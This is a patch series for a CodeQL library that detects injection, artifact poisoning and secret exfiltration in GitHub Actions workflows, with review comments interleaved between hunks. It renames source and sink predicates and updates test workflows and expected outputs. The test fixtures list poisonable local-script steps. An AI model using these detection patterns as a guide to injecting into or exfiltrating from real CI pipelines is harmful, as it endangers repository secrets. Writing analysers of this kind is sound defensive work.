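Review bot: In `madStoreStep` the content name is derived with `output.replaceAll("output.", "")`, which is not trimmed and strips every occurrence of `output.`, whereas `input` here and `fieldName` in `madSource` are always read through `.trim()`. A model row with stray whitespace in its output column would then presumably store under a field name that no read step asks for, and the flow would be lost without any error. `ct.getName() = output.trim().regexpReplaceAll("^output\\.", "")` treats the column like the others and removes only the prefix. The new QLDoc could also say that `c` is the output field named by the model row.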
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,10 +95,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { /** * A Source of untrusted data defined in a MaD specification */ -class ExternallyDefinedSource extends RemoteFlowSource { +class MaDSource extends RemoteFlowSource { string sourceType; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index a40e11bda95..5e624798d69 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,14 +23,18 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -bindingset[var_name, value] -predicate envToRunExpr(string var_name, Run run, string value) { +/** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ +bindingset[var_name, expr] +predicate envToRunExpr(string var_name, Run run, string expr) { // e.g. echo "FOO=$BODY" >> $GITHUB_ENV // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var_name) > 0 or // e.g. // FOO=$(echo $BODY) 
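Review bot: The QLDoc added to `envToRunExpr` opens with "Holds if and environment variable", which should read `Holds if an environment variable is used, directly or indirectly, in a Run step's expression.` It would also help to state that the check is a substring match on `$NAME`, `${NAME` and `$ENV{NAME`, so an `expr` that mentions a longer variable starting with `var_name` holds as well. `run` is not mentioned in the two disjuncts visible here, and the third disjunct continues outside this hunk.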
@@ -40,13 +44,18 @@ predicate envToRunExpr(string var_name, Run run, string value) { var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 ) ) } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | @@ -131,18 +140,6 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo ) } -// predicate dISABLEDenvToOutputStoreStep( -// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -// ) { -// exists(Run run, string var_name, string content, string key, string value | -// writeToGitHubOutput(run, content) and -// extractVariableAndValue(content, key, value) and -// c = any(DataFlow::FieldContent ct | ct.getName() = key) and -// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and -// succ.asExpr() = run and -// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") -// ) -// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and 
@@ -180,7 +177,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since the may not exist an implicit env attribute + // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ec889f19205..47cd38d47fa 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,9 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { - result = this.getLocation() - } + Location getLocation() { result = this.getLocation() } } /** @@ -119,10 +117,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } - /** Gets the location of this callable. */ - Location getLocation() { - result = this.getLocation() - } + /** Gets the location of this callable. */ + Location getLocation() { result = this.getLocation() } } newtype TReturnKind = TNormalReturn() @@ -225,7 +221,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom 
@@ -242,7 +238,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -282,7 +278,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom or @@ -382,7 +378,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or - externallyDefinedStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index c13db5b8127..37f966668df 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -46,7 +46,7 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { - ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") } override string getCommand() { result = "unknown" } } 
diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index c2453cb1652..8cd589fa9f8 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -7,7 +7,7 @@ import codeql.actions.DataFlow class CodeInjectionSink extends DataFlow::Node { CodeInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "code-injection") + madSink(this, "code-injection") } } diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll index 8eda87f1cae..59d523cd582 100644 --- a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } + CommandInjectionSink() { madSink(this, "command-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index e81c6954d72..41e72bc8388 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -44,7 +44,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { } class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { - EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 86913421563..f5a3b5f89a8 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
+++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -46,7 +46,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { - EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } /** diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll index 80e3d93ee69..ca0ac267131 100644 --- a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } + RequestForgerySink() { madSink(this, "request-forgery") } } /** diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 1886af435cf..0317ab28199 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -6,7 +6,7 @@ private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { - SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } + SecretExfiltrationSink() { madSink(this, "secret-exfiltration") } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 3ea9050c832..b5ce78fe062 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 5f1c54e7003..6da9acda906 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } From 29d2b287c9e1d7538211d4dfaadc5174351ceef3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:14:39 +0200 Subject: [PATCH 0405/1267] tests: Organize tests --- .../security/ArtifactPoisoningQuery.qll | 2 + ...logs_gh-action-get-changed-files.model.yml | 10 + .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 247 ++++++++++-------- .../.github/workflows/artifactpoisoning1.yml | 61 ----- .../.github/workflows/artifactpoisoning3.yml} | 0 .../.github/workflows/artifactpoisoning4.yml} | 0 .../.github/workflows/artifactpoisoning5.yml | 23 ++ .../.github/workflows/artifactpoisoning6.yml | 30 +++ .../.github/workflows/artifactpoisoning7.yml | 24 +- .../.github/workflows/artifactpoisoning8.yml | 22 ++ .../CWE-094/CodeInjectionCritical.expected | 45 +++- .../CWE-094/CodeInjectionMedium.expected | 38 ++- .../.github/workflows/artifactpoisoning12.yml | 2 +- ...poisoning8.yml => artifactpoisoning71.yml} | 0 .../ArtifactPoisoningCritical.expected | 14 +- .../CWE-829/ArtifactPoisoningMedium.expected | 10 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- .../UntrustedCheckoutCritical.expected | 12 +- 19 files changed, 318 insertions(+), 228 deletions(-) create mode 100644 ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning61.yml => CWE-094/.github/workflows/artifactpoisoning3.yml} (100%) rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning7.yml => CWE-094/.github/workflows/artifactpoisoning4.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning8.yml => artifactpoisoning71.yml} (100%) 
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index dd409bdbae2..541498ae574 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -254,6 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact not poisonable instanceof LocalScriptExecutionRunStep or poisonable .(LocalScriptExecutionRunStep) diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml new file mode 100644 index 00000000000..a437dc2c4f2 --- /dev/null +++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 55105c39bdf..96dca7f0308 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected 
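Review bot: The comment added in `ArtifactPoisoningSink` describes only the second alternative, but it sits directly above `not poisonable instanceof LocalScriptExecutionRunStep`, which accepts every poisonable step that is not a local script execution. A wording that covers both branches would be `// Any other poisonable step qualifies as is; a local script execution step qualifies only` followed by `// if the path of its command or script matches the path of the downloaded artifact`. The path comparison itself continues outside this hunk, so the second half is taken from the existing comment rather than from visible code.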
@@ -27,4 +27,5 @@ | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 08f9136f2e5..62b04344f39 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -74,7 +74,8 @@ steps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -131,7 +132,8 @@ runSteps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -224,7 +226,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -377,138 +380,142 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| 